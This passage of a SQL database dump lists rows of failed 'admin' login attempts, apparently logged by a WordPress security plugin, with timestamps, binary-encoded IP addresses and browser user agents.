(KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(3002,5349,1628886428.396289,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/J�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3003,5350,1628886745.412838,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3004,5351,1628887112.295765,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3005,5352,1628887464.564678,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3006,5355,1628888161.705808,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3007,5357,1628888756.657287,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(3008,5358,1628888823.326005,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"Q�n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3009,5359,1628889164.266482,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@uK','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3010,5365,1628891294.057233,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����6p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3011,5366,1628891648.333764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-@6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3012,5369,1628892422.990186,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��νY�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(3013,5370,1628892736.719984,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3014,5373,1628893825.635736,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3015,5374,1628894194.369389,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3016,5376,1628894934.757523,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q٤','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3017,5379,1628896116.837028,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(3018,5380,1628896415.009289,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3019,5381,1628896764.616289,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3020,5383,1628897345.143747,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(3021,5384,1628897547.228532,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3022,5385,1628897935.335091,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3023,5388,1628898655.219853,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}:w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3024,5391,1628899805.071224,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���6x]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3025,5392,1628899818.108034,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3M�\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(3026,5393,1628900216.248877,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ћ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3027,5397,1628901943.544240,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ֻ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3028,5399,1628902338.410747,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3029,5400,1628902716.187689,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����zB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3030,5401,1628903139.980145,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3031,5403,1628903546.349788,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���㪽','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(3032,5404,1628903907.980072,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3033,5407,1628905085.734694,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3034,5410,1628906022.806210,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(3035,5412,1628906737.185076,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����L','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3036,5413,1628907145.919889,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3037,5414,1628907266.843217,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���aD�','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(3038,5415,1628907529.268858,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��?\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3039,5415,1628907529.338337,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��?\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3040,5416,1628907981.410220,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ȗ��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3041,5420,1628909206.529335,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3042,5421,1628909637.386273,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VK�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3043,5422,1628909765.255399,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(3044,5424,1628910512.600880,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3045,5425,1628910675.306541,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���O>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3046,5426,1628910977.856347,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-wT�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3047,5427,1628911009.871294,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���=�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(3048,5429,1628911631.331098,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3049,5430,1628911980.567156,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VE3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3050,5431,1628912260.053214,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����@','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(3051,5432,1628912272.912909,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3052,5433,1628912598.456225,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3053,5436,1628913501.052976,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��xO�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(3054,5438,1628913923.770890,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3055,5440,1628914558.602626,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3056,5442,1628914870.236018,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3057,5444,1628915530.510670,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3058,5445,1628915840.246134,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3059,5446,1628916028.748038,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ϴ�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(3060,5448,1628916474.903113,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3061,5449,1628916794.307516,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3062,5450,1628917103.212903,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H��s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3063,5451,1628917294.581158,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#t;','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(3064,5452,1628917439.926451,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3065,5453,1628917737.091403,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3066,5455,1628918371.939731,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3067,5456,1628918545.160822,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����3','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(3068,5458,1628919001.554600,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���kS�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3069,5459,1628919318.324491,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3070,5461,1628919795.499149,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(3071,5462,1628919954.665408,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3072,5463,1628920274.748111,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����6p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3073,5464,1628920593.945288,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��{��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3074,5465,1628921242.768057,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3075,5466,1628921554.055797,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����zB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3076,5467,1628921867.145332,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֖]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3077,5469,1628922372.428164,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3078,5470,1628922682.539031,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3079,5471,1628923024.474026,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3080,5472,1628923356.082989,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3081,5473,1628923581.304770,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����Kj','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(3082,5474,1628923662.272144,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ů�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3083,5475,1628923975.720369,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P��F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3084,5476,1628924290.873418,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3085,5477,1628924643.449288,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��MD~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3086,5478,1628924858.353895,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dd@','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(3087,5479,1628924959.587903,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q٤','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3088,5480,1628925253.281146,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ѷ�N','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3089,5481,1628925575.722594,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3090,5482,1628925939.941918,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3091,5484,1628926224.196759,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3092,5484,1628926224.243105,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3093,5485,1628926870.663480,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ár�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3094,5486,1628927223.490901,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3095,5487,1628927390.411026,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����U�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(3096,5488,1628927527.469338,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3097,5489,1628927848.845085,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3098,5489,1628927848.883722,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3099,5490,1628928199.136792,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3100,5491,1628928529.465710,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dc�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3101,5492,1628928650.473171,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Kȷ','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(3102,5493,1628928830.495283,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����Er','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3103,5494,1628929173.287821,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E1��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3104,5495,1628929505.680039,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3105,5496,1628929840.399724,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3106,5497,1628929906.819194,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����U�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(3107,5498,1628930137.432664,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ћ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3108,5499,1628930485.019413,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3109,5500,1628930828.525033,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3110,5501,1628931127.987459,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��p�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3111,5502,1628931163.848084,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��իо','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(3112,5503,1628931486.584453,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3113,5504,1628931821.377412,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3114,5505,1628932150.177163,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3�:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3115,5506,1628932436.039482,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����l','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(3116,5507,1628932451.088942,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3117,5508,1628932783.352790,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3118,5509,1628933118.754177,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��zt�J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3119,5510,1628933447.783232,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gZ�(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3120,5511,1628933689.828852,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(3121,5514,1628934440.184940,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�*�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3122,5515,1628934800.949059,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3123,5517,1628935125.908242,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�*-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3124,5518,1628935446.220028,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3125,5519,1628935796.673553,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ֻ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3126,5520,1628936112.318413,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3127,5521,1628936209.849623,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��vE��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(3128,5522,1628936437.983040,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���6x]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3129,5524,1628937132.816879,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���R-','Mozilla/5.0 